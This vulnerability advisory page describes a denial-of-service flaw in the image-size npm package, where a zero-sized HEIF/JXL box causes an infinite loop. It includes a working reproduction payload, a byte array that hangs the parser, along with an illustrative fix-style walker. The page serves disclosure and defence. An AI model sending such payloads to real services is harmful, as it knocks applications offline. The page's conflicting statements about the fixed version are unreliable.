VYPR
High severity · 7.5 · NVD Advisory · Published Jun 10, 2026

CVE-2025-71329


Description

image-size versions up to 2.0.2 are vulnerable to a DoS attack via crafted image buffers that cause infinite loops in JXL or HEIF parsers.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.


Vulnerability

The image-size package, in versions up to and including 2.0.2, contains a denial-of-service vulnerability. Remote attackers can cause an infinite loop by providing a specially crafted image buffer. The loop is triggered when a recognized box type within the image data has a zero-valued size field, which prevents the offset from advancing in the JXL or HEIF image parsers [1], [3].

Exploitation

An attacker can exploit this vulnerability by sending a specially crafted image file to an application that uses the image-size package for parsing. The crafted image must contain a box with a size of zero within its JXL or HEIF data. This causes the parsing loop to never terminate, as the offset does not advance, leading to a denial of service [1], [3]. No authentication or user interaction is required.

Impact

Successful exploitation of this vulnerability results in a denial of service. The infinite loop consumes resources and permanently blocks the Node.js event loop, rendering the affected application unresponsive. This can lead to a complete outage of the service provided by the application [3].

Mitigation

This vulnerability has been fixed in image-size version 2.0.3. Users are advised to update to version 2.0.3 or later. No workarounds are available for users who cannot update. The vulnerability was patched in a pull request merged on February 23, 2026 [2].

AI Insight generated on Jun 10, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.


Vulnerability mechanics

Root cause

"The image-size library enters an infinite loop when parsing certain image formats with a crafted zero-sized box."

Attack vector

Remote attackers can trigger a denial of service by supplying a specially crafted image buffer containing a box with a zero-valued size field. This crafted input causes an infinite loop in the JXL or HEIF image parsers, preventing the offset from advancing and hanging the application [ref_id=1]. The vulnerability affects versions up to and including 2.0.2 [ref_id=1].

Affected code

The vulnerability exists within the JXL and HEIF image parsing code paths. Specifically, the `findBox` function, when used in the JXL parsing logic, can encounter a zero-sized box. This leads to an infinite loop in the `extractPartialStreams` function because the offset does not advance [ref_id=1]. A similar issue is present in the HEIF parsing code and the ICNS code path.
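The stall described above and the bounds check that rejects it, as an added illustration that is neither image-size's code nor its patch. `walkBoxes` and `box` are hypothetical names, and the sample buffers are constructed here.

```javascript
const HEADER = 8; // 4-byte big-endian size + 4-byte type

// Walk sibling boxes in buf[start, end). With strict=false this mirrors a
// naive "offset += size" loop; maxSteps caps it so the stall is observable
// instead of hanging the process.
function walkBoxes(buf, start, end, { strict = true, maxSteps = 64 } = {}) {
  const view = new DataView(buf.buffer, buf.byteOffset, buf.byteLength);
  const boxes = [];
  let offset = start;
  for (let steps = 0; offset + HEADER <= end; steps++) {
    if (steps >= maxSteps) return { boxes, stalled: true };
    const size = view.getUint32(offset);
    const type = String.fromCharCode(...buf.subarray(offset + 4, offset + 8));
    // ISO BMFF gives size 0 ("to end of file") and 1 (64-bit largesize) special
    // meanings; this walker rejects them rather than handling them.
    if (strict && (size < HEADER || offset + size > end)) {
      throw new RangeError(`bad box size ${size} for '${type}' at ${offset}`);
    }
    boxes.push({ type, offset, size });
    offset += size; // size === 0 leaves offset unchanged
  }
  return { boxes, stalled: false };
}

// Helper to build a constructed sample box with a chosen size field.
function box(size, type, payloadLen) {
  const b = new Uint8Array(HEADER + payloadLen);
  new DataView(b.buffer).setUint32(0, size);
  for (let i = 0; i < 4; i++) b[4 + i] = type.charCodeAt(i);
  return b;
}

// Constructed samples: one well-formed box, then the same box followed by a
// zero-sized 'ispe' box plus padding.
const good = box(16, "ftyp", 8);
const bad = Uint8Array.from([...box(16, "ftyp", 8), ...box(0, "ispe", 8)]);

console.log(walkBoxes(good, 0, good.length));
console.log(walkBoxes(bad, 0, bad.length, { strict: false, maxSteps: 10 }).stalled);
try {
  walkBoxes(bad, 0, bad.length);
} catch (e) {
  console.log(e.message);
}
```
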

What the fix does

The patch is not explicitly provided in the bundle. However, the advisory indicates that the vulnerability is fixed in later versions. The recommended remediation is to update the image-size library to a version that addresses this issue. The advisory does not specify the exact version where the fix was introduced [ref_id=1].

Preconditions

  • input: A specially crafted image buffer with a zero-valued size field in a recognized box type.

Reproduction

```javascript
// mkdir 2.0.2
// cd 2.0.2/
// npm i image-size@2.0.2
const {imageSize} = require("image-size");

const PAYLOAD = new Uint8Array([
  // ftyp (size=16)
  0x00,0x00,0x00,0x10, 0x66,0x74,0x79,0x70,
  0x61,0x76,0x69,0x66, 0x00,0x00,0x00,0x00,
  // meta (size=36)
  0x00,0x00,0x00,0x24, 0x6D,0x65,0x74,0x61,
  0x00,0x00,0x00,0x00,
  // iprp (size=8)
  0x00,0x00,0x00,0x08, 0x69,0x70,0x72,0x70,
  // ipco (size=20)
  0x00,0x00,0x00,0x14, 0x69,0x70,0x63,0x6F,
  // ispe (size=0) + padding (16 bytes)
  0x00,0x00,0x00,0x00, 0x69,0x73,0x70,0x65,
  0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,
  0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,
]);

imageSize(PAYLOAD)
```

[ref_id=1]

Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3
